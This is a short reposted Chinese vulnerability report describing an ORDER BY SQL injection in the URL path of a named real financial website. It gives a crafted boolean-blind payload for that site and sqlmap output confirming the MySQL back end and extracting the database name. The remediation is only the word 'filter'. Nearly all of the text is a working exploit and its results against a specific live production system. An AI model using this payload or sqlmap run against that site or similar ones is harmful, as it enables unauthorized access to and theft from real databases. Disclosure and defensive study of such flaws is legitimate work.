欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

同花顺某站一处URI注入

程序员文章站 2022-04-07 16:11:43
URI处的order by注入 原始请求 https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml desc处...

URI处的order by注入

原始请求
https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml

desc处存在order by注入,构造payload

https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1,1,(select+1+union+select+2))_1.shtml

sqlmap获取数据如下
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: https://trust.10jqka.com.cn:80/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1 AND 7128=7128,1,(select+1+union+select+2))_1.shtml
---
[21:52:58] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[21:52:58] [INFO] testing MySQL

[21:52:58] [INFO] confirming MySQL

[21:52:58] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.0

[21:52:58] [INFO] fetching current database

[21:52:58] [INFO] resumed: invest

current database: 'invest'

[21:52:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/trust.10jqka.com.cn'

[*] shutting down at 21:52:58

解决方案:

过滤

上一篇: 移动网站该如何优化? 移动网页搜索引擎优化的十个细节

下一篇: 咨询量、权重、流量得有一个正常的理解

推荐阅读